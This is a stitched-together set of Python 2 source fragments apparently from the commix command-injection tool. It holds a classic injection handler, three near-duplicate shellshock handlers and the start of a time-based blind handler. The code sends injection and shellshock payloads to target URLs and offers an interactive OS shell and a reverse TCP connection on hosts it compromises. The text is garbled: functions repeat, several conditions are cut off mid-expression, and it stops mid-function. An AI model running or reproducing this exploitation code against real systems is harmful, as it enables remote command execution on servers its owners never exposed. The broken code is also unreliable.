menu.options.os_cmd: cb_enumeration.single_os_cmd_exec( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Pseudo-Terminal shell go_back = False while True: if go_back == True: break gotshell = raw_input( "(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > " ).lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower( ) in settings.SHELL_OPTIONS: if cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "quit": sys.exit(0) elif cmd.lower() == "back": go_back = True if checks.check_next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True else: pass else: # Command execution results. response = cb_injector.injection( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Evaluate injection results. shell = cb_injector.injection_results( response, TAG) if shell: shell = "".join( str(p) for p in shell) html_parser = HTMLParser.HTMLParser( ) shell = html_parser.unescape( shell) if shell != "": print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: print Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise elif gotshell in settings.CHOISE_NO: if checks.check_next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass if no_result == True: print "" return False else: sys.stdout.write("\r") sys.stdout.flush()
def cb_injection_handler(url, delay, filename, http_request_method): counter = 1 vp_flag = True no_result = True is_encoded= False export_injection_info = False injection_type = "Results-based Command Injection" technique = "classic injection technique" sys.stdout.write("(*) Testing the "+ technique + "... ") sys.stdout.flush() i = 0 # Calculate all possible combinations total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) for whitespace in settings.WHITESPACES: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 # Define alter shell alter_shell = menu.options.alter_shell try: if alter_shell: # Classic -alter shell- decision payload (check if host is vulnerable). payload = cb_payloads.decision_alter_shell(separator, TAG, randv1, randv2) else: # Classic decision payload (check if host is vulnerable). payload = cb_payloads.decision(separator, TAG, randv1, randv2) # Define prefixes & suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = urllib.unquote(payload) payload = base64.b64encode(payload) else: if separator == " " : payload = re.sub(" ", "%20", payload) else: payload = re.sub(" ", whitespace, payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) response = cb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) response = cb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) response = cb_injector.referer_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. response, vuln_parameter = cb_injector.injection_test(payload, http_request_method, url) # Evaluate test results. shell = cb_injector.injection_test_results(response, TAG, randvcalc) if not menu.options.verbose: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if shell == False: sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + float_percent +"%" + " ]") sys.stdout.flush() if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent)+"%" elif len(shell) != 0: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent)+"%" sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except SystemExit: raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", re.sub("%2B", "+",payload)) + Style.RESET_ALL # Check for any enumeration options. if settings.ENUMERATION_DONE == True : while True: enumerate_again = raw_input("\n(?) Do you want to enumerate again? [Y/n/q] > ").lower() if enumerate_again in settings.CHOISE_YES: cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : while True: file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower() if file_access_again in settings.CHOISE_YES: if not menu.options.verbose: print "" cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Check if defined single cmd. if menu.options.os_cmd: cb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" while True: try: # Tab compliter readline.set_completer(menu.tab_completer) readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) if os_shell_option == False: return False elif os_shell_option == "quit": sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": print Fore.YELLOW + "(^) Warning: You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n" elif os_shell_option == "reverse_tcp": # Set up LHOST / LPORT for The reverse TCP connection. lhost, lport = reverse_tcp.configure_reverse_tcp() while True: if lhost and lport in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options(lhost) else: cmd = reverse_tcp.reverse_tcp_options(lhost, lport) result = checks.check_reverse_tcp_options(cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True break # Command execution results. response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Evaluate injection results. shell = cb_injector.injection_results(response, TAG) if menu.options.verbose: print "" print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL else: pass else: # Command execution results. response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Evaluate injection results. shell = cb_injector.injection_results(response, TAG) if shell: shell = "".join(str(p) for p in shell) html_parser = HTMLParser.HTMLParser() shell = html_parser.unescape(shell) if shell != "": print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: if menu.options.verbose: print "" print Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise except SystemExit: raise elif gotshell in settings.CHOISE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" info_msg = "Testing the " + technique + "... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + settings.print_payload(payload)) header = {check_header : payload} request = urllib2.Request(url, None, header) response = urllib2.urlopen(request) if not menu.options.verbose: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL elif cve in percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent )+ "%" info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vuln_parameter = "HTTP Header" vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload) logs.update_payload(filename, counter, payload) if cve in no_result = False success_msg = "The (" + check_header + ") '" + Style.UNDERLINE success_msg += url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "." print "\n" + settings.print_success_msg(success_msg) print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL if not menu.options.verbose: print "" # Enumeration options. if settings.ENUMERATION_DONE == True : if menu.options.verbose: print "" while True: question_msg = "Do you want to enumerate again? [Y/n/q] > " enumerate_again = raw_input(settings.print_question_msg(question_msg)).lower() if enumerate_again in settings.CHOICE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOICE_NO: break elif enumerate_again in settings.CHOICE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) + "\n" pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True : while True: question_msg = "Do you want to access files again? [Y/n/q] > " file_access_again = raw_input(settings.print_question_msg(question_msg)).lower() if file_access_again in settings.CHOICE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) + "\n" pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell, payload = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL sys.exit(0) else: # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False: if menu.options.verbose: print "" question_msg = "Do you want a Pseudo-Terminal? [Y/n/q] > " gotshell = raw_input(settings.print_question_msg(question_msg)).lower() if gotshell in settings.CHOICE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": warn_msg = "You are already into an 'os_shell' mode." print settings.print_warning_msg(warn_msg)+ "\n" elif os_shell_option == "reverse_tcp": # Set up LHOST / LPORT for The reverse TCP connection. reverse_tcp.configure_reverse_tcp() while True: if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options(settings.LHOST) else: cmd = reverse_tcp.reverse_tcp_options() result = checks.check_reverse_tcp_options(cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True settings.REVERSE_TCP = False break # Command execution results. shell, payload = cmd_exec(url, cmd, cve, check_header, filename) if menu.options.verbose: print "" err_msg = "The reverse TCP connection to the target host has been failed!" print settings.print_error_msg(err_msg) else: pass else: shell, payload = cmd_exec(url, cmd, cve, check_header, filename) if shell != "": print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: if menu.options.verbose: print "\n" + settings.print_payload(payload) err_msg = "The '" + cmd + "' command, does not return any output." print settings.print_error_msg(err_msg) + "\n" except KeyboardInterrupt: raise except SystemExit: raise except: print "" sys.exit(0) elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) + "\n" continue break else: continue except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print "\n" + settings.print_error_msg(err_msg) continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit()
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" info_msg = "Testing the " + technique + "... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: sys.stdout.write("\n" + settings.print_payload(payload)) elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print "\n" + settings.print_info_msg(info_msg) print settings.print_payload(payload) header = {check_header: payload} request = urllib2.Request(url, None, header) log_http_headers.check_http_traffic(request) response = urllib2.urlopen(request) percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False elif len( > 0 and cve in percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False elif len( > 0 and cve in percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False else: percent = str(float_percent) + "%" if not settings.VERBOSITY_LEVEL >= 1: info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if no_result == False: # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) #if vp_flag == True: vuln_parameter = "HTTP Header" the_type = " " + vuln_parameter check_header = " " + check_header vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload) check_header = check_header[1:] logs.update_payload(filename, counter, payload) success_msg = "The (" + check_header + ") '" success_msg += url + Style.RESET_ALL + Style.BRIGHT success_msg += "' seems vulnerable via " + technique + "." print "\n" + settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + "\"" + payload + "\"" + Style.RESET_ALL if not settings.VERBOSITY_LEVEL >= 1: print "" # Enumeration options. if settings.ENUMERATION_DONE == True: if settings.VERBOSITY_LEVEL >= 1: print "" while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " sys.stdout.write( settings.print_question_msg(question_msg)) enumerate_again = sys.stdin.readline().replace( "\n", "").lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "y" if enumerate_again in settings.CHOICE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOICE_NO: break elif enumerate_again in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True: while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " sys.stdout.write( settings.print_question_msg(question_msg)) file_access_again = sys.stdin.readline( ).replace("\n", "").lower() else: file_access_again = "" if len(file_access_again) == 0: file_access_again = "y" if file_access_again in settings.CHOICE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell, payload = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL sys.exit(0) else: # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False: if settings.VERBOSITY_LEVEL >= 1: print "" if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " sys.stdout.write( settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace( "\n", "").lower() else: gotshell = "" if len(gotshell) == 0: gotshell = "y" if gotshell in settings.CHOICE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: if not readline_error: # Tab compliter readline.set_completer( menu.tab_completer) # MacOSX tab compliter if getattr( readline, '__doc__', '' ) is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind( "bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind( "tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower( ) in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options( cmd.lower(), technique, go_back, no_result) go_back, go_back_again = check_options( url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again) if go_back: break else: shell, payload = cmd_exec( url, cmd, cve, check_header, filename) if shell != "": # Update logs with executed cmds and execution results. logs.executed_command( filename, cmd, shell) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: info_msg = "Executing the '" + cmd + "' command... " if settings.VERBOSITY_LEVEL == 1: sys.stdout.write( "\n" + settings. print_info_msg( info_msg)) elif settings.VERBOSITY_LEVEL > 1: sys.stdout.write( settings. print_info_msg( info_msg)) sys.stdout.flush() sys.stdout.write( "\n" + settings.print_payload( payload) + "\n") #print "\n" + settings.print_payload(payload) err_msg = "The '" + cmd + "' command, does not return any output." print settings.print_critical_msg( err_msg) + "\n" except KeyboardInterrupt: raise except SystemExit: raise except: print "" sys.exit(0) elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) continue break else: continue if no_result: print "" except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print "\n" + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit()
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" sys.stdout.write("(*) Testing the " + technique + "... ") sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) header = {check_header: payload} request = urllib2.Request(url, None, header) response = urllib2.urlopen(request) if not menu.options.verbose: percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL elif cve in percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent) + "%" sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vuln_parameter = "HTTP Header" vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload) logs.update_payload(filename, counter, payload) if cve in no_result = False print Style.BRIGHT + "\n(!) The (" + check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title( ) + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title( ) + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL # Enumeration options. if settings.ENUMERATION_DONE == True: print "" while True: enumerate_again = raw_input( "(?) Do you want to enumerate again? [Y/n/q] > " ).lower() if enumerate_again in settings.CHOISE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True: while True: file_access_again = raw_input( "(?) Do you want to access files again? [Y/n/q] > " ).lower() if file_access_again in settings.CHOISE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL sys.exit(0) else: # Pseudo-Terminal shell go_back = False while True: if go_back == True: break if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False: print "" gotshell = raw_input( "(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > " ).lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower( ) in settings.SHELL_OPTIONS: if cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "quit": sys.exit(0) elif cmd.lower() == "back": go_back = True if checks.check_next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True else: pass else: shell = cmd_exec( url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise except: print "" sys.exit(0) elif gotshell in settings.CHOISE_NO: if checks.check_next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL continue break else: continue except urllib2.HTTPError, err: print "\n" + Fore.YELLOW + "(^) Warning: " + str(err) + Style.RESET_ALL
def tb_injection_handler(url, timesec, filename, http_request_method, url_time_response): counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False possibly_vulnerable = False false_positive_warning = False export_injection_info = False how_long = 0 injection_type = "blind OS command injection" technique = "time-based command injection technique" if settings.VERBOSITY_LEVEL >= 1: info_msg = "Testing the " + "(" + injection_type.split( " ")[0] + ") " + technique + "... " print settings.print_info_msg(info_msg) # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: warn_msg = "The '--url-reload' option is not available in " + technique + "." print settings.print_warning_msg(warn_msg) #whitespace = checks.check_whitespaces() # Calculate all possible combinations total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len( settings.SEPARATORS) * len(settings.SUFFIXES) for whitespace in settings.WHITESPACE: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False # If a previous session is available. how_long_statistic = [] if settings.LOAD_SESSION and session_handler.notification( url, technique, injection_type): try: settings.TIME_BASED_STATE = True cmd = shell = "" url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation( url, http_request_method) checks.check_for_stored_tamper(payload) settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - timesec except TypeError: err_msg = "An error occurred while accessing session file ('" err_msg += settings.SESSION_FILE + "'). " err_msg += "Use the '--flush-session' option." print settings.print_critical_msg(err_msg) sys.exit(0) if settings.RETEST == True: settings.RETEST = False from src.core.injections.results_based.techniques.classic import cb_handler cb_handler.exploitation(url, timesec, filename, http_request_method) if not settings.LOAD_SESSION: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Define alter shell alter_shell = menu.options.alter_shell # Change TAG on every request to prevent false-positive results. TAG = ''.join( random.choice(string.ascii_uppercase) for num_of_chars in range(6)) tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: if alter_shell: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision_alter_shell( separator, TAG, output_length, timesec, http_request_method) else: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision( separator, TAG, output_length, timesec, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) # Check for base64 / hex encoding payload = checks.perform_payload_encoding( payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") print settings.print_payload(payload_msg) # Check if defined 